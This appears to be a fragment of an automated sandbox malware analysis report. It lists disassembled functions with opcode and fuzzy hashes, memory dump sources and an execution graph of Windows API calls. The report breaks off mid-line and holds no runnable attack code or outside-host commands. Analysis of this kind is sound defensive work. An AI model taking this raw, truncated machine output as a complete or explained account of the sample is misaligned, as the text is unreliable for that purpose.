                                                                                                              • Opcode ID: 591907b252f2c9df4c13a6ad6dee41b95158bb378aa7d95fba86f5b48b760439
                                                                                                              • Instruction ID: f3da606a204d7ce7416b4711585ef572cc4cbb8491c6e7733fcfccea3f4ba3f8
                                                                                                              • Opcode Fuzzy Hash: 591907b252f2c9df4c13a6ad6dee41b95158bb378aa7d95fba86f5b48b760439
                                                                                                              • Instruction Fuzzy Hash: C4D05B313001155F860CF6A8E860F9E77DDD7867503100D65E545DF344DE35ED054BD5
                                                                                                              Function 01182CF8 Relevance: .0, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cad48fe7890e0babe84df3d9eb713e0faf64addb1735bc0be936a70a515cbb26
                                                                                                              • Instruction ID: 3814dbf0b2b9f6f34c527c9f7e8fcd21b5d091fed08066d2b2ef9688034482cc
                                                                                                              • Opcode Fuzzy Hash: cad48fe7890e0babe84df3d9eb713e0faf64addb1735bc0be936a70a515cbb26
                                                                                                              • Instruction Fuzzy Hash: 57D0A7313001255B820CB2ACF870F9E77DDD7857503000D25E645DF388DE29EC004BD5
                                                                                                              Function 011811A0 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889e69f6a8dd654ddd7fd46b4ad29c28c7406646257cadb0ed40153cae4cb74f
                                                                                                              • Instruction ID: cf99460363c70c13801a930881dcbca8055ee8b5b6c5ea5585cf2ecde27f23f6
                                                                                                              • Opcode Fuzzy Hash: 889e69f6a8dd654ddd7fd46b4ad29c28c7406646257cadb0ed40153cae4cb74f
                                                                                                              • Instruction Fuzzy Hash: 98D01772D05348AFDB11DFB8C44579D7BF8EB05240F2144D5E489D7205DA319F10CB95
                                                                                                              Function 01184003 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2c365cb21b4a616c2ad71bd2ab2ee2e5cf2ef572db30741bc1f9a9c3b78f11fa
                                                                                                              • Instruction ID: 199000cec7e3de2f1a7d3fda9caf839de339b794ff2a501465a874b5044ace82
                                                                                                              • Opcode Fuzzy Hash: 2c365cb21b4a616c2ad71bd2ab2ee2e5cf2ef572db30741bc1f9a9c3b78f11fa
                                                                                                              • Instruction Fuzzy Hash: 6BE08C31A00208EFCB60DFB8EA406EEBBF1EF81300B2085ADD489D7205D6311E00CB00
                                                                                                              Function 0118951B Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 855f5c673b4ef4c7c2ebc55cc1c201e461f492fd63b72f91da3d7cd5a0858c89
                                                                                                              • Instruction ID: 50d5b673ccba1e1b9ce0cd2c91972fc3f86740966232c26ea35527127c531534
                                                                                                              • Opcode Fuzzy Hash: 855f5c673b4ef4c7c2ebc55cc1c201e461f492fd63b72f91da3d7cd5a0858c89
                                                                                                              • Instruction Fuzzy Hash: 90D0A92000FBC00FE30302210D228DB3FB8AC422C470F40C3E880CA0D3C0284A2D83B2
                                                                                                              Function 01184008 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f11edcba5cce9d397fd44def57204bd32dc911c6a3dbe34da1faf7a83ab02572
                                                                                                              • Instruction ID: b345820bd294af82e58030e88543dfa053a77fe97d950388d7d4480d4b5b653b
                                                                                                              • Opcode Fuzzy Hash: f11edcba5cce9d397fd44def57204bd32dc911c6a3dbe34da1faf7a83ab02572
                                                                                                              • Instruction Fuzzy Hash: B3D05E32A0020DEFCB50EFE8EA4099EB7F9EB45200B1045A8D448DB204EA312F00DB91
                                                                                                              Function 011890D8 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a62c250c1426c054b11ca520f443492317c46584bfb7316cc86cf820508890ee
                                                                                                              • Instruction ID: eef65eee04ad5ccc650422ab950be9016b3929609a87b506c364cea745f7e20e
                                                                                                              • Opcode Fuzzy Hash: a62c250c1426c054b11ca520f443492317c46584bfb7316cc86cf820508890ee
                                                                                                              • Instruction Fuzzy Hash: 73D05B70D0120DEFCB40EFA5D90195D77F9EB49200B1046ADD409D7200EE312F009B81
                                                                                                              Function 011834C3 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a565b8e826817d1535983305bd293477c877216b2b44e9e0f488a3110cb30117
                                                                                                              • Instruction ID: 767241acb90fa6257bf2d81a64850b662e3cc8a30b51e8bc1d762d307a7eefcf
                                                                                                              • Opcode Fuzzy Hash: a565b8e826817d1535983305bd293477c877216b2b44e9e0f488a3110cb30117
                                                                                                              • Instruction Fuzzy Hash: A9D022366001028FEA18A7A4F0841ECB330FB881157308661E20941104DB3A0B2B4B80
                                                                                                              Function 011834A3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98960bca2b28528d375fdc547435f9570d62c2cc0be30c6cbaffa5817b6776b3
                                                                                                              • Instruction ID: 66e9e3ffbd6d0cf8fe5b35ae8dc3ee7564df8628c24d700f891869adec5f6e6d
                                                                                                              • Opcode Fuzzy Hash: 98960bca2b28528d375fdc547435f9570d62c2cc0be30c6cbaffa5817b6776b3
                                                                                                              • Instruction Fuzzy Hash: 9DD02236B103168B9E0CBB64F4400DCB320FB845293108222D91913304CF365B268FC2
                                                                                                              Function 01188155 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 596a82186aed25075cf472fbffa83c942fd8efa45e04896e938b5890a54569ee
                                                                                                              • Instruction ID: 1c929d6194f56d79ed060ca721af7dc14eabf2448eb106d5961069b036d193a3
                                                                                                              • Opcode Fuzzy Hash: 596a82186aed25075cf472fbffa83c942fd8efa45e04896e938b5890a54569ee
                                                                                                              • Instruction Fuzzy Hash: 4AD0C93120A3808FD30A4A3684185697F65AF82149B5E80EFD0868E1A3D62AC856DB21
                                                                                                              Function 011847F0 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6596e269d0c12d4ece7b793381db8f403252e1277d9e152a13ca8b8cc9da54d0
                                                                                                              • Instruction ID: 5242d3e9f9a3b46040503c4a546446b71b42f797c7baeb473539a2af2808c80a
                                                                                                              • Opcode Fuzzy Hash: 6596e269d0c12d4ece7b793381db8f403252e1277d9e152a13ca8b8cc9da54d0
                                                                                                              • Instruction Fuzzy Hash: 56D0C938340204CFC718AB68D05881573BABB8C60531008A8E50A8B375DA32EC01CA50
                                                                                                              Function 011847EB Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d3d11fdaa20ca86e548805157b9a48cce506c25fb8b84f1e6ba4bd66e2e2670
                                                                                                              • Instruction ID: 5d386512262b67e64094ca17bb25dfd7a6927a57da62bc496bcb65831d2e78e0
                                                                                                              • Opcode Fuzzy Hash: 9d3d11fdaa20ca86e548805157b9a48cce506c25fb8b84f1e6ba4bd66e2e2670
                                                                                                              • Instruction Fuzzy Hash: 0AD09238340601CFCB29AB34D1A98A57BB6EF9921531509ECE44ACB76ADA329C02CB10
                                                                                                              Function 01180840 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32d236fdb07bc3b6d09bf0e29a438422061dd241ee9e9cf1502a413d35060054
                                                                                                              • Instruction ID: f36e784dfae542aae232de4df97b1a3a25571323dccfcd9dffe7da827b55c392
                                                                                                              • Opcode Fuzzy Hash: 32d236fdb07bc3b6d09bf0e29a438422061dd241ee9e9cf1502a413d35060054
                                                                                                              • Instruction Fuzzy Hash: 1ED0CA3041A384AFDB128BA8D4944883FB0EE1722432485DBE889DA06BC226A918CB02
                                                                                                              Function 01184B53 Relevance: .0, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c3716bf0bf348f1cee99fb10ca7f8a7b7acec92b2c208c91d37b32d0647c3db
                                                                                                              • Instruction ID: ecf12740a7b3424252f124ed1750f6ad38aeb781951f2eb2377f89cebc187a50
                                                                                                              • Opcode Fuzzy Hash: 8c3716bf0bf348f1cee99fb10ca7f8a7b7acec92b2c208c91d37b32d0647c3db
                                                                                                              • Instruction Fuzzy Hash: 84C002341542459FDB11BBA0E845B443BBEBB45704F244C90E1418B168C6A65C11DF10
                                                                                                              Function 01180F2C Relevance: .0, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 951c14d093d66355c334812088d38c29f0f68de806a575a079e8268d6b9ae436
                                                                                                              • Instruction ID: 9f6bcb47aa68e890048a06e3506536dc0524151981982c2045cd1dc37c5a9700
                                                                                                              • Opcode Fuzzy Hash: 951c14d093d66355c334812088d38c29f0f68de806a575a079e8268d6b9ae436
                                                                                                              • Instruction Fuzzy Hash: CFB09237A00019968B04D699E4404ECBB30DA94232F044032C20062000862015AA8662
                                                                                                              Function 01180850 Relevance: .0, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d09e828a3d4795ffde4d008c0296c6234dff478b6c1e9a4f2fa1cacfb51ad244
                                                                                                              • Instruction ID: 81af600009ca5db0f23e262fed126f238f477388780a15137a2c385fe24c8b39
                                                                                                              • Opcode Fuzzy Hash: d09e828a3d4795ffde4d008c0296c6234dff478b6c1e9a4f2fa1cacfb51ad244
                                                                                                              • Instruction Fuzzy Hash: 23900231044A1CCF8950279579495957B5CD9585157800051B54E955065A5A65104696

                                                                                                              Non-executed Functions

                                                                                                              Function 0118DDE8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \Vl
                                                                                                              • API String ID: 0-682378881
                                                                                                              • Opcode ID: 44128256b6b920fef92674cf20234db711353d8c460497ecb61cb9a0142ff431
                                                                                                              • Instruction ID: d4f2a07d76205bd4f87ae1d7b806cb33ac7cd920e500cff5619497f5d4197d88
                                                                                                              • Opcode Fuzzy Hash: 44128256b6b920fef92674cf20234db711353d8c460497ecb61cb9a0142ff431
                                                                                                              • Instruction Fuzzy Hash: 18B13B70E002198FDF28DFA9D8857DDBBF2AF88314F14C529E815A7294EB749846CF91
                                                                                                              Function 0118DAA0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \Vl
                                                                                                              • API String ID: 0-682378881
                                                                                                              • Opcode ID: 033748b6aa794eafb18e0bb47b483aba2945e6a6b0a4d946e58f8ccb8a7bbddc
                                                                                                              • Instruction ID: b67f48dcb2d338ae122d4db79d991dc4b67b210ce550ee038f31bcc78c034acc
                                                                                                              • Opcode Fuzzy Hash: 033748b6aa794eafb18e0bb47b483aba2945e6a6b0a4d946e58f8ccb8a7bbddc
                                                                                                              • Instruction Fuzzy Hash: EA916C70E003099FDF28DFA9E99179DBBF2AF89314F14C529E815AB294DB749841CF81
                                                                                                              Function 0118E6B8 Relevance: .3, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaa3384df80cfdc3021c2891d3abc38bb6dd224d1bde00d47ec65cdbf301f59
                                                                                                              • Instruction ID: 0c55ef3ec1a1434d3388a1ff56b4176351ad0e2dc17db29a83e16f0a94cccd53
                                                                                                              • Opcode Fuzzy Hash: 8eaa3384df80cfdc3021c2891d3abc38bb6dd224d1bde00d47ec65cdbf301f59
                                                                                                              • Instruction Fuzzy Hash: E2B15E70E01609CFDB28EFA9D88579DBFF2AF89314F14C529D815A7294EB749841CF81

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:7.4%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:8.6%
                                                                                                              Total number of Nodes:2000
                                                                                                              Total number of Limit Nodes:42
                                                                                                              execution_graph 21364 406220 21365 406237 21364->21365 21366 406248 21364->21366 21381 406190 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 21365->21381 21367 406251 GetCurrentThreadId 21366->21367 21369 40625e 21366->21369 21367->21369 21377 405ec4 21369->21377 21371 406241 21371->21366 21372 4062a5 21373 4062d1 FreeLibrary 21372->21373 21375 4062d7 21372->21375 21373->21375 21374 406313 21375->21374 21376 406308 ExitProcess 21375->21376 21378 405f08 21377->21378 21379 405ed3 21377->21379 21378->21372 21379->21378 21382 414634 21379->21382 21381->21371 21383 41465c 21382->21383 21384 41463c 21382->21384 21383->21379 21385 41463f InterlockedCompareExchange 21384->21385 21385->21385 21386 41464d CloseHandle 21385->21386 21386->21383 21386->21385 21387 403220 21388 403230 21387->21388 21389 4032b8 21387->21389 21392 403274 21388->21392 21393 40323d 21388->21393 21390 4032c1 21389->21390 21391 402b58 21389->21391 21394 4032d9 21390->21394 21406 4033e8 21390->21406 21397 403533 21391->21397 21398 402b7a VirtualQuery 21391->21398 21399 402c5b 21391->21399 21395 402ca4 10 API calls 21392->21395 21396 403248 21393->21396 21400 402ca4 10 API calls 21393->21400 21402 4032fc 21394->21402 21407 4033c0 21394->21407 21430 4032e0 21394->21430 21418 40328b 21395->21418 21411 402c23 21398->21411 21412 402bb3 21398->21412 21405 402c59 21399->21405 21409 402ca4 10 API calls 21399->21409 21416 403255 21400->21416 21401 40344c 21403 402ca4 10 API calls 21401->21403 21423 403465 21401->21423 21415 40333c Sleep 21402->21415 21402->21430 21426 4034fc 21403->21426 21404 4032b1 21406->21401 21414 403424 Sleep 21406->21414 21406->21423 21413 402ca4 10 API calls 21407->21413 21428 402c72 21409->21428 21410 40326d 21439 402ca4 21411->21439 21412->21411 21421 402be0 VirtualAlloc 21412->21421 21422 402bde 21412->21422 21432 4033c9 21413->21432 21414->21401 21419 40343e Sleep 21414->21419 21420 403354 Sleep 21415->21420 21415->21430 21416->21410 21424 403028 10 API calls 21416->21424 21418->21404 21427 403028 10 API calls 21418->21427 21419->21406 21420->21402 21421->21411 21429 402bf6 VirtualAlloc 21421->21429 21422->21421 21424->21410 21425 4033e1 21426->21423 21433 403028 10 API calls 21426->21433 21427->21404 21428->21405 21434 403028 10 API calls 21428->21434 21429->21411 21431 402c0c 21429->21431 21431->21405 21432->21425 21436 403028 10 API calls 21432->21436 21437 403520 21433->21437 21434->21405 21435 402c2a 21435->21405 21463 403028 21435->21463 21436->21425 21440 402f04 21439->21440 21441 402cbc 21439->21441 21442 40301c 21440->21442 21443 402ec8 21440->21443 21449 402cce 21441->21449 21455 402d59 Sleep 21441->21455 21444 402a50 VirtualAlloc 21442->21444 21445 403025 21442->21445 21450 402ee2 Sleep 21443->21450 21452 402f22 21443->21452 21447 402a8b 21444->21447 21448 402a7b 21444->21448 21445->21435 21446 402cdd 21446->21435 21447->21435 21483 402a08 21448->21483 21449->21446 21456 402d9d Sleep 21449->21456 21458 402dbc 21449->21458 21450->21452 21454 402ef8 Sleep 21450->21454 21453 402f40 21452->21453 21457 402990 VirtualAlloc 21452->21457 21453->21435 21454->21443 21455->21449 21459 402d6f Sleep 21455->21459 21456->21458 21461 402db3 Sleep 21456->21461 21457->21453 21462 402dc8 21458->21462 21489 402990 21458->21489 21459->21441 21461->21449 21462->21435 21464 403120 21463->21464 21465 40303d 21463->21465 21466 402ab4 21464->21466 21467 403043 21464->21467 21465->21467 21470 4030ba Sleep 21465->21470 21468 40321a 21466->21468 21471 402a08 2 API calls 21466->21471 21469 40304c 21467->21469 21474 4030fe Sleep 21467->21474 21477 403135 21467->21477 21468->21405 21469->21405 21470->21467 21473 4030d4 Sleep 21470->21473 21472 402ac5 21471->21472 21475 402af5 21472->21475 21476 402adb VirtualFree 21472->21476 21473->21465 21474->21477 21478 403114 Sleep 21474->21478 21479 402aec 21475->21479 21480 402afe VirtualQuery VirtualFree 21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 